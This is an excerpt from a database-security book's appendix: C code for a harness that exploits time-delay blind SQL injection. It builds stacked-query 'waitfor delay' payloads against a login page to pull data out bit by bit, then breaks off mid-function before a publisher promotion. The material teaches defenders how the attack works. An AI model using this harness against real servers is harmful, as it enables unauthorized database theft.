APPENDIX A
Example C Code for a Time-Delay SQL Injection Harness
int main( int argc, char *argv[] )
{
int i, t;
HANDLE h_thread[32];
memset( out, 0, 1024 * 64 );
if ( argc != 4 )
return syntax();
query = argv[1];
bit_start = atoi( argv[2] );
bit_end = atoi( argv[3] );
for( i = bit_start; i < bit_end; i += 1 )
{
for( t = 0; t < 1; t++ )
{
h_thread[t] = (HANDLE)_beginthread( thread_proc, 0,
(void *)(i+t) );
}
if ( WaitForMultipleObjects( 1, h_thread, TRUE, 30000
) == WAIT_TIMEOUT )
{
printf( "Error - timeout waiting for response\n" ); return 1; } if ( ( out[ i / 8 ] == 0 ) && ( out[ (i / 8) - 1 ] == 0 ) ) { printf("Done!\n"); return 0; } } return 0; } int create_get_bit_request( char *query, int bit, char *request, int buff_len ) { char params[ 1024 * 64 ] = ""; char content_length[32] = ""; char tmp[32] = ""; char query_string[1024 * 64] = ""; int i; // create bit-retriveal query string safe_strcat( query_string, "'; ", buff_len ); safe_strcat( query_string, query, buff_len ); sprintf( params, " if (ascii(substring(@s, %d, 1)) & ( power(2, %d))) > 0 waitfor delay '0:0:4'--", (bit / 8)+1, bit % 8 ); safe_strcat( query_string, params, buff_len ); params[0] = 0; safe_strcat( request, "POST /login.asp HTTP/1.1\r\n", buff_len ); safe_strcat( request, "Content-Type: application/x-www-form- urlencoded\r\n", buff_len ); safe_strcat( request, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)\r\n", buff_len ); safe_strcat( request, "Host: 192.168.0.1\r\n", buff_len ...Get The Database Hacker's Handbook: Defending Database Servers now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.
